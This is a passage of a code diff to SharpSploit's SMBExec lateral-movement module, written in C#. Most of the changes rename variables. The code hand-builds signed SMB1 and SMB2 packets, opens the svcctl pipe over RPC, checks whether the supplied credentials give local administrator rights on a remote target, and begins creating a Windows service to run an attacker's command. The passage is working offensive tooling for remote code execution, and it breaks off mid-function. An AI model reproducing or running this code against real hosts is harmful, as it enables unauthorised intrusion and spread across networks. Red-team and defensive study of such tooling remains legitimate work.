-                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                        SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                                        Packet_SMB_Data = SMBExec.SMBTreeDisconnectRequest();
+                                        SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
 
-                                        if (SMB_signing)
+
+                                        if (SMB_Signing)
                                         {
-                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).ToArray();
-                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
+                                            SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
-                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "Logoff";
                                     }
                                     break;
                                 case "Logoff":
                                     {
-                                        packet_SMB_header = SMBExec.SMBHeader(new byte[] { 0x74 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0x34, 0xfe }, process_ID_Bytes, SMB_user_ID);
+                                        Packet_SMB_Header = SMBExec.SMBHeader(new byte[] { 0x74 }, new byte[] { 0x18 }, new byte[] { 0x07, 0xc8 }, new byte[] { 0x34, 0xfe }, Process_ID_Bytes, SMB_User_ID);
 
-                                        if (SMB_signing)
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB_header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
-                                            SMB_signing_counter += 2;
-                                            byte[] SMB_signing_sequence = BitConverter.GetBytes(SMB_signing_counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_signing_sequence;
+                                            Packet_SMB_Header["SMBHeader_Flags2"] = new byte[] { 0x05, 0x48 };
+                                            SMB_Signing_Counter += 2;
+                                            SMB_Signing_Sequence = BitConverter.GetBytes(SMB_Signing_Counter).Concat(new byte[] { 0x00, 0x00, 0x00, 0x00 }).ToArray();
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signing_Sequence;
                                         }
-                                        byte[] SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
-                                        OrderedDictionary packet_SMB_data = SMBExec.SMBLogoffAndXRequest();
-                                        byte[] SMB_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_data);
-                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB_header.Length, SMB_data.Length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
+                                        SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
+                                        Packet_SMB_Data = SMBExec.SMBLogoffAndXRequest();
+                                        SMB_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Data);
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB_Header.Length, SMB_Data.Length);
 
-                                        if (SMB_signing)
+
+                                        if (SMB_Signing)
                                         {
-                                            MD5CryptoServiceProvider MD5Crypto = new MD5CryptoServiceProvider();
-                                            byte[] SMB_Sign = session_key.Concat(SMB_header).Concat(SMB_data).ToArray();
-                                            byte[] SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
+                                            SMB_Sign = Session_Key.Concat(SMB_Header).Concat(SMB_Data).ToArray();
+                                            SMB_Signature = MD5Crypto.ComputeHash(SMB_Sign);
                                             SMB_Signature = Utilities.GetByteRange(SMB_Signature, 0, 7);
-                                            packet_SMB_header["SMBHeader_Signature"] = SMB_Signature;
-                                            SMB_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB_header);
+                                            Packet_SMB_Header["SMBHeader_Signature"] = SMB_Signature;
+                                            SMB_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB_header).Concat(SMB_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB_Header).Concat(SMB_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "exit";
                                     }
                                     break;
@@ -2092,137 +2075,135 @@ namespace SharpSploit.LateralMovement
                     else
                     {
                         SMBClientStage = "TreeConnect";
-                        while (SMBClientStage != "exit" && SMBExec_failed == false)
+                        HMACSHA256 HMAC_SHA256 = new HMACSHA256();
+
+                        while (SMBClientStage != "exit" && SMBExec_Failed == false)
                         {
                             if (debug) { output.AppendLine(String.Format("Current Stage {0}", SMBClientStage)); }
                             switch (SMBClientStage)
                             {
                                 case "TreeConnect":
                                     {
-                                        SMB2_message_ID++;
-                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x03, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        SMB2_Message_ID++;
+                                        Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x03, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                                        Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
 
-                                        if (SMB_signing)
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                            Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
                                         }
 
-                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2TreeConnectRequest(SMB_path_bytes);
-                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
-                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                        if (SMB_signing)
+                                        Packet_SMB2_Data = SMBExec.SMB2TreeConnectRequest(SMB_Path_Bytes);
+                                        SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                                        SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
+                                        if (SMB_Signing)
                                         {
-                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).ToArray();
-                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            HMAC_SHA256 = new HMACSHA256();
+                                            SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
+                                            SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
-                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
-                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                            Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "CreateRequest";
                                     }
                                     break;
                                 case "CreateRequest":
                                     {
-                                        SMB2_tree_ID = new byte[] { 0x01, 0x00, 0x00, 0x00 };
-                                        SMB_named_pipe_bytes = new byte[] { 0x73, 0x00, 0x76, 0x00, 0x63, 0x00, 0x63, 0x00, 0x74, 0x00, 0x6c, 0x00 }; //svcctl
-                                        SMB2_message_ID++;
-                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x05, 0x0 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
-                                        if (SMB_signing)
+                                        SMB2_Tree_ID = new byte[] { 0x01, 0x00, 0x00, 0x00 };
+                                        SMB_Named_Pipe_Bytes = new byte[] { 0x73, 0x00, 0x76, 0x00, 0x63, 0x00, 0x63, 0x00, 0x74, 0x00, 0x6c, 0x00 }; //svcctl
+                                        SMB2_Message_ID++;
+                                        Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x05, 0x0 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                                        Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                            Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
                                         }
-                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2CreateRequestFile(SMB_named_pipe_bytes);
-                                        packet_SMB2_data["SMB2CreateRequestFIle_Share_Access"] = new byte[] { 0x07, 0x00, 0x00, 0x00 };
-                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
-                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                        if (SMB_signing)
+                                        Packet_SMB2_Data = SMBExec.SMB2CreateRequestFile(SMB_Named_Pipe_Bytes);
+                                        Packet_SMB2_Data["SMB2CreateRequestFIle_Share_Access"] = new byte[] { 0x07, 0x00, 0x00, 0x00 };
+                                        SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                                        SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
+                                        if (SMB_Signing)
                                         {
-                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).ToArray();
-                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            HMAC_SHA256 = new HMACSHA256();
+                                            SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
+                                            SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
-                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
-                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                            Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "RPCBind";
                                     }
                                     break;
                                 case "RPCBind":
                                     {
-                                        SMB_named_pipe_bytes = new byte[] { 0x73, 0x00, 0x76, 0x00, 0x63, 0x00, 0x63, 0x00, 0x74, 0x00, 0x6c, 0x00 }; //svcctl
-                                        SMB2_message_ID++;
-                                        SMB_file_ID = Utilities.GetByteRange(SMBClientReceive, 132, 147);
-                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
-                                        if (SMB_signing)
+                                        SMB_Named_Pipe_Bytes = new byte[] { 0x73, 0x00, 0x76, 0x00, 0x63, 0x00, 0x63, 0x00, 0x74, 0x00, 0x6c, 0x00 }; //svcctl
+                                        SMB2_Message_ID++;
+                                        SMB_File_ID = Utilities.GetByteRange(SMBClientReceive, 132, 147);
+                                        Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                                        Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                            Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
                                         }
-                                        OrderedDictionary packet_RPC_data = SMBExec.RPCBind(1, new byte[] { 0xb8, 0x10 }, new byte[] { 0x01 }, new byte[] { 0x0, 0x00 }, SMB_named_pipe_UUID, new byte[] { 0x02, 0x00 });
-                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length);
-                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
-                                        int RPC_data_length = SMB2_data.Length + RPC_data.Length;
-                                        OrderedDictionary packet_netBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_netBIOS_session_service);
-                                        if (SMB_signing)
+                                        Packet_RPC_Data = SMBExec.RPCBind(1, new byte[] { 0xb8, 0x10 }, new byte[] { 0x01 }, new byte[] { 0x0, 0x00 }, SMB_named_pipe_UUID, new byte[] { 0x02, 0x00 });
+                                        RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                        Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length);
+                                        SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                                        SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
+                                        int RPC_Data_Length = SMB2_Data.Length + RPC_Data.Length;
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
+                                        if (SMB_Signing)
                                         {
-                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).ToArray();
-                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            HMAC_SHA256 = new HMACSHA256();
+                                            SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).ToArray();
+                                            SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
-                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
-                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                            Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "ReadRequest";
-                                        SMB_client_stage_next = "OpenSCManagerW";
+                                        SMB_Client_Stage_Next = "OpenSCManagerW";
                                     }
                                     break;
                                 case "ReadRequest":
                                     {
                                         Thread.Sleep(sleep * 1000);
-                                        SMB2_message_ID++;
-                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x08, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
-                                        packet_SMB2_header["SMB2Header_CreditCharge"] = new byte[] { 0x10, 0x00 };
-                                        if (SMB_signing)
+                                        SMB2_Message_ID++;
+                                        Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x08, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                                        Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        Packet_SMB2_Header["SMB2Header_CreditCharge"] = new byte[] { 0x10, 0x00 };
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                            Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
                                         }
 
-                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2ReadRequest(SMB_file_ID);
-                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
-                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, SMB2_data.Length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                        if (SMB_signing)
+                                        Packet_SMB2_Data = SMBExec.SMB2ReadRequest(SMB_File_ID);
+                                        SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                                        SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, SMB2_Data.Length);
+                                        if (SMB_Signing)
                                         {
-                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).ToArray();
-                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            HMAC_SHA256 = new HMACSHA256();
+                                            SMB2_Sign = SMB2_Header.Concat(SMB2_Data).ToArray();
+                                            SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
-                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
-                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                            Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 12, 15)) != "03-01-00-00")
                                         {
-                                            SMBClientStage = SMB_client_stage_next;
+                                            SMBClientStage = SMB_Client_Stage_Next;
                                         }
                                         else
                                         {
@@ -2237,42 +2218,42 @@ namespace SharpSploit.LateralMovement
                                         SMBClientStream.Read(SMBClientReceive, 0, SMBClientReceive.Length);
                                         if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 12, 15)) != "03-01-00-00")
                                         {
-                                            SMBClientStage = SMB_client_stage_next;
+                                            SMBClientStage = SMB_Client_Stage_Next;
                                         }
                                     }
                                     break;
                                 case "OpenSCManagerW":
                                     {
-                                        SMB2_message_ID = 30;
-                                        packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                                        packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
-                                        if (SMB_signing)
+                                        SMB2_Message_ID = 30;
+                                        Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                                        Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                        if (SMB_Signing)
                                         {
-                                            packet_SMB2_header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
+                                            Packet_SMB2_Header["SMB2Header_Flags"] = new byte[] { 0x08, 0x00, 0x00, 0x00 };
                                         }
-                                        OrderedDictionary packet_SCM_data = SMBExec.SCMOpenSCManagerW(SMB_service_bytes, SMB_service_length);
-                                        SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
-                                        OrderedDictionary packet_RPC_data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0f, 0x00 }, null);
-                                        byte[] RPC_data = Utilities.ConvertFromPacketOrderedDictionary(packet_RPC_data);
-                                        OrderedDictionary packet_SMB2_data = SMBExec.SMB2WriteRequest(SMB_file_ID, RPC_data.Length + SCM_data.Length);
-                                        byte[] SMB2_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_data);
-                                        byte[] SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
-                                        int RPC_data_Length = SMB2_data.Length + SCM_data.Length + RPC_data.Length;
-                                        OrderedDictionary packet_NetBIOS_session_service = SMBExec.NetBIOSSessionService(SMB2_header.Length, RPC_data_Length);
-                                        byte[] NetBIOS_session_service = Utilities.ConvertFromPacketOrderedDictionary(packet_NetBIOS_session_service);
-                                        if (SMB_signing)
+                                        Packet_SCM_Data = SMBExec.SCMOpenSCManagerW(SMB_Service_bytes, SMB_Service_Length);
+                                        SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
+                                        Packet_RPC_Data = SMBExec.RPCRequest(new byte[] { 0x03 }, SCM_Data.Length, 0, 0, new byte[] { 0x01, 0x00, 0x00, 0x00 }, new byte[] { 0x00, 0x00 }, new byte[] { 0x0f, 0x00 }, null);
+                                        RPC_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_RPC_Data);
+                                        Packet_SMB2_Data = SMBExec.SMB2WriteRequest(SMB_File_ID, RPC_Data.Length + SCM_Data.Length);
+                                        SMB2_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Data);
+                                        SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
+                                        int RPC_Data_Length = SMB2_Data.Length + SCM_Data.Length + RPC_Data.Length;
+                                        NetBIOS_Session_Service = GetNetBIOSSessionService(SMB2_Header.Length, RPC_Data_Length);
+
+                                        if (SMB_Signing)
                                         {
-                                            HMACSHA256 HMAC_SHA256 = new HMACSHA256();
-                                            byte[] SMB2_Sign = SMB2_header.Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                            byte[] SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
+                                            HMAC_SHA256 = new HMACSHA256();
+                                            SMB2_Sign = SMB2_Header.Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                            SMB2_Signature = HMAC_SHA256.ComputeHash(SMB2_Sign);
                                             SMB2_Signature = Utilities.GetByteRange(SMB2_Signature, 0, 15);
-                                            packet_SMB2_header["SMB2Header_Signature"] = SMB2_Signature;
-                                            SMB2_header = Utilities.ConvertFromPacketOrderedDictionary(packet_SMB2_header);
+                                            Packet_SMB2_Header["SMB2Header_Signature"] = SMB2_Signature;
+                                            SMB2_Header = Utilities.ConvertFromPacketOrderedDictionary(Packet_SMB2_Header);
                                         }
-                                        SMB_client_send = NetBIOS_session_service.Concat(SMB2_header).Concat(SMB2_data).Concat(RPC_data).Concat(SCM_data).ToArray();
-                                        SMBClientReceive = SendStream(SMBClientStream, SMB_client_send);
+                                        SMB_Client_Send = NetBIOS_Session_Service.Concat(SMB2_Header).Concat(SMB2_Data).Concat(RPC_Data).Concat(SCM_Data).ToArray();
+                                        SMBClientReceive = SendStream(SMBClientStream, SMB_Client_Send);
                                         SMBClientStage = "ReadRequest";
-                                        SMB_client_stage_next = "CheckAccess";
+                                        SMB_Client_Stage_Next = "CheckAccess";
 
                                     }
                                     break;
@@ -2281,12 +2262,12 @@ namespace SharpSploit.LateralMovement
                                     {
                                         if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 128, 131)) == "00-00-00-00" && BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 108, 127)) != "00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00")
                                         {
-                                            SMB_service_manager_context_handle = Utilities.GetByteRange(SMBClientReceive, 108, 127);
+                                            SMB_Service_Manager_Context_Handle = Utilities.GetByteRange(SMBClientReceive, 108, 127);
                                             if (SMB_execute)
                                             {
-                                                OrderedDictionary packet_SCM_data = SMBExec.SCMCreateServiceW(SMB_service_manager_context_handle, SMB_service_bytes, SMB_service_length, SMBExec_command, SMBExec_command_length_bytes);
-                                                SCM_data = Utilities.ConvertFromPacketOrderedDictionary(packet_SCM_data);
-                                                if (SCM_data.Length < SMB_split_index)
+                                                Packet_SCM_Data = SMBExec.SCMCreateServiceW(SMB_Service_Manager_Context_Handle, SMB_Service_bytes, SMB_Service_Length, SMBExec_Command, SMBExec_Command_Length_bytes);
+                                                SCM_Data = Utilities.ConvertFromPacketOrderedDictionary(Packet_SCM_Data);
+                                                if (SCM_Data.Length < SMB_Split_Index)
                                                 {
                                                     SMBClientStage = "CreateServiceW";
                                                 }
@@ -2298,103 +2279,101 @@ namespace SharpSploit.LateralMovement
                                             else
                                             {
 
-                                                output.AppendLine(String.Format("{0} is a local administrator on {1}", output_username, target));
-                                                SMB2_message_ID += 20;
-                                                SMB_close_service_handle_stage = 2;
+                                                output.AppendLine(String.Format("{0} is a local administrator on {1}", Output_Username, Target));
+                                                SMB2_Message_ID += 20;
+                                                SMB_Close_Service_Handle_Stage = 2;
                                                 SMBClientStage = "CloseServiceHandle";
                                             }
 
                                         }
                                         else if (BitConverter.ToString(Utilities.GetByteRange(SMBClientReceive, 128, 131)) == "05-00-00-00")
                                         {
-                                            output.AppendLine(String.Format("{0} is not a local administrator or does not have the required privileges on {1}", output_username, target));
-                                            SMBExec_failed = true;
+                                            output.AppendLine(String.Format("{0} is not a local administrator or does not have the required privileges on {1}", Output_Username, Target));
+                                            SMBExec_Failed = true;
                                         }
                                         else
                                         {
-                                            output.AppendLine(String.Format("Something went wrong with {0}", target));
-                                            SMBExec_failed = true;
+                                            output.AppendLine(String.Format("Something went wrong with {0}", Target));
+                                            SMBExec_Failed = true;
                                         }
 
                                     }
                                     break;
                                 case "CreateServiceW":
                                     {
-                                        if (SMBExec_command.Length < SMB_split_index)
+                                        if (SMBExec_Command.Length < SMB_Split_Index)
                                         {
-                                            SMB2_message_ID += 20;
-                                            packet_SMB2_header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_message_ID, SMB2_tree_ID, SMB_session_ID);
-                                            packet_SMB2_header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
-                                            if (SMB_signing)
+                                            SMB2_Message_ID += 20;
+                                            Packet_SMB2_Header = SMBExec.SMB2Header(new byte[] { 0x09, 0x00 }, SMB2_Message_ID, SMB2_Tree_ID, SMB_Session_ID);
+                                            Packet_SMB2_Header["SMB2Header_CreditRequest"] = new byte[] { 0x7f, 0x00 };
+                                            if (SMB_Signing)
                                             {
